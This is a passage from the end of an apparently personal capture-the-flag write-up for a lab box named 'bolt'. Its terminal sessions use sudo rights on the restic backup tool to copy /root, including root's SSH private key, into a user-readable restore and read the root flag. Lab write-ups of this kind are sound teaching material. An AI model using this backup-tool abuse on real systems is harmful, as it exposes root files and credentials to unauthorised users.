<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@bolt:~/html<span class="nv">$ </span><span class="nb">sudo </span>restic backup <span class="nt">-r</span> rest:http://localhost:8000 /root
enter password <span class="k">for </span>repository: 
password is correct
found 2 old cache directories <span class="k">in</span> /var/www/.cache/restic, pass <span class="nt">--cleanup-cache</span> to remove them
scan <span class="o">[</span>/root]
scanned 10 directories, 14 files <span class="k">in </span>0:00
<span class="o">[</span>0:00] 100.00%  28.066 KiB / 28.066 KiB  24 / 24 items  0 errors  ETA 0:00 
duration: 0:00
snapshot 4b5b25b7 saved
</code></pre></div></div>

<h2 id="restoring-the-backuped-data-as-user">Restoring the backuped data as user</h2>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bolt@bolt:/tmp/.aa<span class="nv">$ </span>restic snapshots <span class="nt">-r</span> <span class="nb">.</span>
enter password <span class="k">for </span>repository: 
password is correct
ID        Date                 Host        Tags        Directory
<span class="nt">----------------------------------------------------------------------</span>
4b5b25b7  2019-12-03 07:35:31  bolt                    /root
<span class="nt">----------------------------------------------------------------------</span>
1 snapshots
bolt@bolt:/tmp/.aa<span class="nv">$ </span>restic restore 4 <span class="nt">-r</span> <span class="nb">.</span> <span class="nt">--target</span> <span class="nb">.</span> 
enter password <span class="k">for </span>repository: 
password is correct
restoring &lt;Snapshot 4b5b25b7 of <span class="o">[</span>/root] at 2019-12-03 07:35:31.243300115 +0000 UTC by root@bolt&gt; to <span class="nb">.</span>
ignoring error <span class="k">for</span> /root/.bash_history: Lchown: lchown /tmp/.aa/root/.bash_history: operation not permitted
ignoring error <span class="k">for</span> /root/.bashrc: Lchown: lchown /tmp/.aa/root/.bashrc: operation not permitted
ignoring error <span class="k">for</span> /root/.cache/motd.legal-displayed: Lchown: lchown /tmp/.aa/root/.cache/motd.legal-displayed: operation not permitted
ignoring error <span class="k">for</span> /root/.cache: Lchown: lchown /tmp/.aa/root/.cache: operation not permitted
ignoring error <span class="k">for</span> /root/.config/composer/keys.dev.pub: Lchown: lchown /tmp/.aa/root/.config/composer/keys.dev.pub: operation not permitted
ignoring error <span class="k">for</span> /root/.config/composer/keys.tags.pub: Lchown: lchown /tmp/.aa/root/.config/composer/keys.tags.pub: operation not permitted
ignoring error <span class="k">for</span> /root/.config/composer: Lchown: lchown /tmp/.aa/root/.config/composer: operation not permitted
ignoring error <span class="k">for</span> /root/.config: Lchown: lchown /tmp/.aa/root/.config: operation not permitted
ignoring error <span class="k">for</span> /root/.gnupg/private-keys-v1.d: Lchown: lchown /tmp/.aa/root/.gnupg/private-keys-v1.d: operation not permitted
ignoring error <span class="k">for</span> /root/.gnupg: Lchown: lchown /tmp/.aa/root/.gnupg: operation not permitted
ignoring error <span class="k">for</span> /root/.local/share/nano: Lchown: lchown /tmp/.aa/root/.local/share/nano: operation not permitted
ignoring error <span class="k">for</span> /root/.local/share: Lchown: lchown /tmp/.aa/root/.local/share: operation not permitted
ignoring error <span class="k">for</span> /root/.local: Lchown: lchown /tmp/.aa/root/.local: operation not permitted
ignoring error <span class="k">for</span> /root/.profile: Lchown: lchown /tmp/.aa/root/.profile: operation not permitted
ignoring error <span class="k">for</span> /root/.selected_editor: Lchown: lchown /tmp/.aa/root/.selected_editor: operation not permitted
ignoring error <span class="k">for</span> /root/.ssh/authorized_keys: Lchown: lchown /tmp/.aa/root/.ssh/authorized_keys: operation not permitted
ignoring error <span class="k">for</span> /root/.ssh/id_rsa: Lchown: lchown /tmp/.aa/root/.ssh/id_rsa: operation not permitted
ignoring error <span class="k">for</span> /root/.ssh/id_rsa.pub: Lchown: lchown /tmp/.aa/root/.ssh/id_rsa.pub: operation not permitted
ignoring error <span class="k">for</span> /root/.ssh: Lchown: lchown /tmp/.aa/root/.ssh: operation not permitted
ignoring error <span class="k">for</span> /root/.wget-hsts: Lchown: lchown /tmp/.aa/root/.wget-hsts: operation not permitted
ignoring error <span class="k">for</span> /root/config.yml: Lchown: lchown /tmp/.aa/root/config.yml: operation not permitted
ignoring error <span class="k">for</span> /root/cron.sh: Lchown: lchown /tmp/.aa/root/cron.sh: operation not permitted
ignoring error <span class="k">for</span> /root/root.txt: Lchown: lchown /tmp/.aa/root/root.txt: operation not permitted
ignoring error <span class="k">for</span> /root: Lchown: lchown /tmp/.aa/root: operation not permitted
There were 24 errors
bolt@bolt:/tmp/.aa<span class="nv">$ </span><span class="nb">ls
</span>bin  config  data  index  keys  locks  root  snapshots
bolt@bolt:/tmp/.aa<span class="nv">$ </span><span class="nb">cd </span>root/
bolt@bolt:/tmp/.aa/root<span class="nv">$ </span><span class="nb">ls
</span>config.yml  cron.sh  root.txt
bolt@bolt:/tmp/.aa/root<span class="nv">$ </span><span class="nb">cat </span>root.txt 
ntrkz#########################gw
</code></pre></div></div>

<p>Boom, we got root flag.
It wasnt that easy when got to this point, someone had a script running that delete the root flag on each bloody reset, and spend 1 WHOLE DAY enumerating beyond the intended, oh man those were dark times, until I pinged someone on the forum and told me the flag was there as usual, proper sleep and we got the flag the next day.</p>

<p>Loved that box, was highly fun.</p>
:ET